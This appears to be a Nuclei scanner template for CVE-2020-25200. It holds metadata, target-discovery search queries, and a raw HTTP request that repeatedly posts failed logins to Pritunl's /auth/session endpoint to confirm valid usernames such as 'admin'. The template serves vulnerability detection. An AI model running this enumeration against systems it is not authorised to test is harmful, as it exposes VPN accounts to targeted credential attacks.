id: CVE-2020-25200

info:
  name: Pritunl VPN Server 1.29.2145.25 - Username Enumeration
  author: pussycat0x
  severity: medium
  description: |
    Pritunl 1.29.2145.25 contains a username enumeration issue caused by different error responses in /auth/session login attempts, letting attackers verify valid usernames. Exploitation requires network access to the login endpoint.
  impact: |
    Attackers can enumerate valid VPN usernames, potentially aiding targeted attacks or credential stuffing efforts.
  remediation: |
    Implement uniform error responses for login attempts to prevent username enumeration.
  reference:
    - https://github.com/lukaszstu/pritunl-CVE-2020-25200/blob/master/CVE-2020-25200
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-25200
    cwe-id: CWE-203
    epss-score: 0.72966
    epss-percentile: 0.98802
    cpe: cpe:2.3:a:pritunl:pritunl:1.29.2145.25:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 25
    vendor: pritunl
    product: pritunl
    shodan-query: http.title:"pritunl"
    fofa-query: title="pritunl"
    google-query: intitle:"pritunl"
  tags: cve,cve2020,pritunl,vpn,enum

http:
  - raw:
      - |
        POST /auth/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/login

        {"username":"{{username}}","password":"{{rand_int(10000,99999)}}"}

    attack: pitchfork
    payloads:
      username:
        - "pritunl"
        - "admin"
      attempt:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
        - "11"
        - "12"
        - "13"
        - "14"
        - "15"
        - "16"
        - "17"
        - "18"
        - "19"
        - "20"
        - "21"
        - "22"
        - "23"
        - "24"
        - "25"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_any(body, "Too many authentication attempts", "auth_too_many")'
          - 'contains(header, "application/json")'
        condition: and
# digest: 4b0a00483046022100b941edcd338d87574e7937dd170158b336df47814a84c1406d16245b8418f0fd02210090852b3f2a5ceb5c4f53e29c0f04a9b50c7c953dc8e7a7c7d5233964a3fa0366:922c64590222798bb761d5b6d8e72950